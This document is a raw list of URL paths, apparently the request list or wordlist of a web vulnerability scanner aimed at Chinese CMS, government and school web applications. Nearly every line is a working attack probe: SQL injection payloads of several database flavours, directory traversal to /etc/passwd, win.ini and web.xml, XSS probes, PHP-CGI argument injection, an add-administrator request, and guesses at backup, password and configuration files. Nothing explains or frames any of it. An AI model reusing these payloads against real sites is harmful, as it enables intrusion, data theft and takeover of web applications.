/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
/adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
/adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
/adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
/ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
/admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
/include/upload.asp
/TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
/TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
/Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
/WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
/WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
/Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
/Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
/products.asp
/App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
/product_view.asp
/system/database/data.mdb
/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
/manage/CHKLOGIN.ASP
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
/Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
/search.asp
/onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
/db1/%23kepu.mdb
/upfile.asp
/upfile2.asp
/upfile3.asp
/data/xinfang.mdb
/VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
/Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
/WS/WebServiceBase.asmx/GetXMLList
/WS/WebService.asmx/GetFile
/WS/WebService.asmx/GetFileContent
/WS/WebService.asmx
/bos/desktop/ajax/EcAjax.aspx
/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
/Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
/ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
/interface/ipsconnect/ipsconnect.php
/templates/
/service/local/outreach/welcome/nexusSpaces.css
/phpRedisAdmin/?overview
/?overview
/index.html#/dashboard/file/logstash.json
/
/index.php/weblinks-categories?id=just_test
/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
/index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
/index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
/share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
/oxoxoxoxoxoxox.com
/oxoxoxoxoxoxox.com/
/api/xmlrpc
/wwwroot.rar
/wwwroot.zip
/wwwroot.tar.gz
/web.rar
/www.rar
/www.zip
/www.tar.gz
/web.zip
/crossdomain.xml
/webscan_test.txt
/phpinfo.php
/info.php
/test.php
/shop.php?ac=view&shopid=1-cfreer
/wp-includes/registration-functions.php
/wp-includes/registration.php
/
/
/NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
/pass.txt
/passwd
/password.txt
/passwords.txt
/users.txt
/users.ini
/admin.cfg
/install.log
/database.inc
/common.inc
/db.inc
/connect.inc
/conn.inc
/sql.inc
/.bash_history
/.bashrc
/Web.config
/Global.asax
/Global.asa
/Global.asax.cs
/data.mdb
/domcfg.nsf
/names.nsf
/log.nsf
/domlog.nsf
/.rediscli_history
/data/%23data.mdb
/config.inc.php.bak
/config/config_ucenter.php.bak
/config/config_global.php.bak
/uc_server/data/config.inc.php.bak
/data/common.inc.php.bak
/wp-config.php.bak
/WEB-INF/database.properties
/
/robots.txt
/
/index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E
/
/nevercouldexistfilenosec
/nevercouldexistfilewebsec
/nevercouldexistfilenosec.aspx
/nevercouldexistfilewebsec.aspx
/nevercouldexistfilenosec.shtml
/nevercouldexistfilewebsec.shtml
/nevercouldexistfilenosec/
/nevercouldexistfilewebsec/
/nevercouldexistfilenosec.zip
/nevercouldexistfilewebsec.zip
/nevercouldexistfilenosec.php
/nevercouldexistfilewebsec.php
/nevercouldexistfilenosec.bak
/nevercouldexistfilewebsec.bak
/nevercouldexistfilenosec.rar
/nevercouldexistfilewebsec.rar
/
/wp-admin
/admin.php
/
/dede/
/administrator/
/user
/jsky_web_scanner_test_file.txt
/TRACE_test
/nosec_Web_Scanner_Test.dll
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/TRACK_test
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/_vti_bin/_vti_adm/admin.dll
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/_vti_bin/_vti_aut/author.dll
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/_vti_bin/shtml.exe?_vti_rpc
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/server-info
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/server-status
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/jmx-console/
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/web-console/
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/webscan360noThisFile*~1*/.aspx
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/cgi-bin/php-cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/.../.../.../.../.../.../.../.../windows/win.ini
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
/
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/phpMyAdmin/show_config_errors.php
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
/phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
/xampp/index.php
